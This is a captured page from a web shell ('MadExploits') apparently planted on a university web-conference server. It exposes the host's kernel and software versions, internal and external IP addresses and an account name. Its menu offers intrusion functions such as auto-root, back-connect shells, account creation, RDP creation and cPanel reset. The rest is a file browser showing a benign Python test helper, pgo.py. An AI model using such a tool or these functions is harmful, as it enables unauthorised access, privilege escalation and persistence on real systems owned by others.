Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.142.135.127
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.8 /
test /
libregrtest /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
119
B
-rw-r--r--
cmdline.py
18.63
KB
-rw-r--r--
main.py
24.07
KB
-rw-r--r--
pgo.py
1.31
KB
-rw-r--r--
refleak.py
8
KB
-rw-r--r--
runtest.py
10.29
KB
-rw-r--r--
runtest_mp.py
15.28
KB
-rw-r--r--
save_env.py
11.04
KB
-rw-r--r--
setup.py
3.61
KB
-rw-r--r--
utils.py
1.56
KB
-rw-r--r--
win_utils.py
6.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgo.py
# Set of tests run by default if --pgo is specified. The tests below were # chosen based on the following criteria: either they exercise a commonly used # C extension module or type, or they run some relatively typical Python code. # Long running tests should be avoided because the PGO instrumented executable # runs slowly. PGO_TESTS = [ 'test_array', 'test_base64', 'test_binascii', 'test_binop', 'test_bisect', 'test_bytes', 'test_bz2', 'test_cmath', 'test_codecs', 'test_collections', 'test_complex', 'test_dataclasses', 'test_datetime', 'test_decimal', 'test_difflib', 'test_embed', 'test_float', 'test_fstring', 'test_functools', 'test_generators', 'test_hashlib', 'test_heapq', 'test_int', 'test_itertools', 'test_json', 'test_long', 'test_lzma', 'test_math', 'test_memoryview', 'test_operator', 'test_ordered_dict', 'test_pickle', 'test_pprint', 'test_re', 'test_set', 'test_sqlite', 'test_statistics', 'test_struct', 'test_tabnanny', 'test_time', 'test_unicode', 'test_xml_etree', 'test_xml_etree_c', ] def setup_pgo_tests(ns): if not ns.args and not ns.pgo_extended: # run default set of tests for PGO training ns.args = PGO_TESTS[:]
Close